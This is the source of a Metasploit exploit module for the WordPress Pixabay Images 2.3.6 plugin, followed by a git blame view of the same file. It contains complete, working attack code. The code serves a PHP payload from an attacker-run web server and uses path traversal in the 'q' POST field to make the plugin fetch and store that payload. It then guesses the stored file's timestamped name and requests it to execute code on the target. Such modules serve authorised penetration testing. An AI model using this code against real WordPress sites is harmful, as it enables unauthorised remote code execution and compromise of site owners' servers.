metasploit-framework/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient
  include Msf::HTTP::Wordpress

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Pixabay Images PHP Code Upload',
      'Description'    => %q{
        This module exploits multiple vulnerabilities in the WordPress plugin Pixabay
        Images 2.3.6. The plugin does not check the host of a provided download URL
        which can be used to store and execute malicious PHP code on the system.
      },
      'Author'	=>
        [
          'h0ng10', # Discovery, Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt'],
          ['OSVDB', '117145'],
          ['OSVDB', '117146'],
          ['WPVDB', '7758']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['pixabay-images 2.3', {}]],
      'DefaultTarget'  => 0,
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => 'Jan 19 2015'
    ))

    register_options(
      [
        OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]),
        OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 4])
      ], self.class)
  end


  # Handle incoming requests from the server
  def on_request_uri(cli, request)
      print_status("URI requested: #{request.raw_uri}")
      send_response(cli, payload.encoded)
  end

  # Create a custom URI
  def generate_payload_uri
      "#{get_uri}.php"
  end

  def call_payload(file_name)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', file_name)
    }, 3)

    res
  end

  def exploit
    unless wordpress_and_online?
      fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site")
    end

    print_status("#{peer} - Starting up web service...")
    start_service

    payload_uri = generate_payload_uri
    vprint_status("#{peer} - Using URI #{payload_uri}")

    random_file_name = rand_text_alphanumeric(rand(5) + 5)
    post = {
      'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
      'image_url' => payload_uri,
      'image_user' => rand_text_alphanumeric(rand(5) + 5),
      'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
    }

    print_status("#{peer} - Uploading payload #{random_file_name}...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_backend),
      'vars_post' => post
    })

    stop_service

    unless res && res.code == 200 && res.headers['date']
      fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")
    end

    server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i

    print_status("#{peer} - Calling payload...")
    datastore['TRIES'].times do |i|
      payload_name = "#{random_file_name}_#{server_epoch_time + i}.php"
      res = call_payload(payload_name)
      if (res && res.code == 200) || session_created?
        register_files_for_cleanup(payload_name)
        break
      end
    end
  end

  def check
    res = wordpress_and_online?
    unless res
      vprint_error("#{peer} - It doesn't look like a WordPress site")
      return Exploit::CheckCode::Unknown
    end

    # Send a request with a illegal URL to verify that the target is vulnerable
    post = {
      'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
      'image_url' => rand_text_alphanumeric(rand(5) + 5),
      'image_user' => rand_text_alphanumeric(rand(5) + 5),
      'q' => rand_text_alphanumeric(rand(5) + 5)
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_backend),
      'vars_post' => post
    })

    if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end
end
Initial commit 2015-01-19 16:23:48 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class Metasploit3 < Msf::Exploit::Remote`
Do better session creation handling 2015-02-03 23:00:37 +00:00			`include Msf::Exploit::FileDropper`
Initial commit 2015-01-19 16:23:48 +00:00			`include Msf::Exploit::Remote::HttpServer`
			`include Msf::Exploit::Remote::HttpClient`
Do better session creation handling 2015-02-03 23:00:37 +00:00			`include Msf::HTTP::Wordpress`
Initial commit 2015-01-19 16:23:48 +00:00
			`Rank = ExcellentRanking`

			`def initialize(info = {})`
			`super(update_info(info,`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 18:36:47 +00:00			`'Name' => 'WordPress Pixabay Images PHP Code Upload',`
Initial commit 2015-01-19 16:23:48 +00:00			`'Description' => %q{`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 18:36:47 +00:00			`This module exploits multiple vulnerabilities in the WordPress plugin Pixabay`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`Images 2.3.6. The plugin does not check the host of a provided download URL`
			`which can be used to store and execute malicious PHP code on the system.`
Initial commit 2015-01-19 16:23:48 +00:00			`},`
			`'Author' =>`
			`[`
			`'h0ng10', # Discovery, Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt'],`
			`['OSVDB', '117145'],`
			`['OSVDB', '117146'],`
			`['WPVDB', '7758']`
Initial commit 2015-01-19 16:23:48 +00:00			`],`
			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['pixabay-images 2.3', {}]],`
			`'DefaultTarget' => 0,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`},`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`'Stance' => Msf::Exploit::Stance::Aggressive,`
Initial commit 2015-01-19 16:23:48 +00:00			`'DisclosureDate' => 'Jan 19 2015'`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`))`
Initial commit 2015-01-19 16:23:48 +00:00
Do minor cleanup 2015-02-03 22:07:27 +00:00			`register_options(`
			`[`
Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]),`
Do better session creation handling 2015-02-03 23:00:37 +00:00			`OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 4])`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`], self.class)`
Initial commit 2015-01-19 16:23:48 +00:00			`end`


			`# Handle incoming requests from the server`
			`def on_request_uri(cli, request)`
Make the calling payload code easier 2015-02-03 22:23:04 +00:00			`print_status("URI requested: #{request.raw_uri}")`
Initial commit 2015-01-19 16:23:48 +00:00			`send_response(cli, payload.encoded)`
			`end`

Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`# Create a custom URI`
Initial commit 2015-01-19 16:23:48 +00:00			`def generate_payload_uri`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`"#{get_uri}.php"`
Initial commit 2015-01-19 16:23:48 +00:00			`end`

Do better session creation handling 2015-02-03 23:00:37 +00:00			`def call_payload(file_name)`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`res = send_request_cgi({`
			`'method' => 'GET',`
Do better session creation handling 2015-02-03 23:00:37 +00:00			`'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', file_name)`
Make the calling payload code easier 2015-02-03 22:23:04 +00:00			`}, 3)`
Do minor cleanup 2015-02-03 22:07:27 +00:00
			`res`
Initial commit 2015-01-19 16:23:48 +00:00			`end`

			`def exploit`
			`unless wordpress_and_online?`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 18:36:47 +00:00			`fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site")`
Initial commit 2015-01-19 16:23:48 +00:00			`end`

Do minor cleanup 2015-02-03 22:07:27 +00:00			`print_status("#{peer} - Starting up web service...")`
Initial commit 2015-01-19 16:23:48 +00:00			`start_service`

			`payload_uri = generate_payload_uri`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`vprint_status("#{peer} - Using URI #{payload_uri}")`
Initial commit 2015-01-19 16:23:48 +00:00
Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`random_file_name = rand_text_alphanumeric(rand(5) + 5)`
Initial commit 2015-01-19 16:23:48 +00:00			`post = {`
Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`'image_url' => payload_uri,`
Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`'image_user' => rand_text_alphanumeric(rand(5) + 5),`
			`'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"`
Initial commit 2015-01-19 16:23:48 +00:00			`}`

Do better session creation handling 2015-02-03 23:00:37 +00:00			`print_status("#{peer} - Uploading payload #{random_file_name}...")`
Initial commit 2015-01-19 16:23:48 +00:00			`res = send_request_cgi({`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`'method' => 'POST',`
			`'uri' => normalize_uri(wordpress_url_backend),`
			`'vars_post' => post`
			`})`
Initial commit 2015-01-19 16:23:48 +00:00
Make the calling payload code easier 2015-02-03 22:23:04 +00:00			`stop_service`

Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`unless res && res.code == 200 && res.headers['date']`
			`fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")`
			`end`

Do minor cleanup 2015-02-03 22:07:27 +00:00			`server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i`
Initial commit 2015-01-19 16:23:48 +00:00
Do minor cleanup 2015-02-03 22:07:27 +00:00			`print_status("#{peer} - Calling payload...")`
Make the calling payload code easier 2015-02-03 22:23:04 +00:00			`datastore['TRIES'].times do \|i\|`
Do better session creation handling 2015-02-03 23:00:37 +00:00			`payload_name = "#{random_file_name}_#{server_epoch_time + i}.php"`
			`res = call_payload(payload_name)`
			`if (res && res.code == 200) \|\| session_created?`
			`register_files_for_cleanup(payload_name)`
			`break`
			`end`
Initial commit 2015-01-19 16:23:48 +00:00			`end`
			`end`

			`def check`
			`res = wordpress_and_online?`
			`unless res`
Mostly caps/grammar/spelling, GoodRanking on MBAM 2015-02-05 18:36:47 +00:00			`vprint_error("#{peer} - It doesn't look like a WordPress site")`
Initial commit 2015-01-19 16:23:48 +00:00			`return Exploit::CheckCode::Unknown`
			`end`

			`# Send a request with a illegal URL to verify that the target is vulnerable`
			`post = {`
Allow to provide the traversal depth 2015-02-03 22:38:40 +00:00			`'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),`
			`'image_url' => rand_text_alphanumeric(rand(5) + 5),`
			`'image_user' => rand_text_alphanumeric(rand(5) + 5),`
			`'q' => rand_text_alphanumeric(rand(5) + 5)`
Initial commit 2015-01-19 16:23:48 +00:00			`}`

			`res = send_request_cgi({`
Do minor cleanup 2015-02-03 22:07:27 +00:00			`'method' => 'POST',`
			`'uri' => normalize_uri(wordpress_url_backend),`
			`'vars_post' => post`
			`})`
Initial commit 2015-01-19 16:23:48 +00:00
Do minor cleanup 2015-02-03 22:07:27 +00:00			`if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/`
Initial commit 2015-01-19 16:23:48 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`

Do minor cleanup 2015-02-03 22:07:27 +00:00			`Exploit::CheckCode::Safe`
Initial commit 2015-01-19 16:23:48 +00:00			`end`
			`end`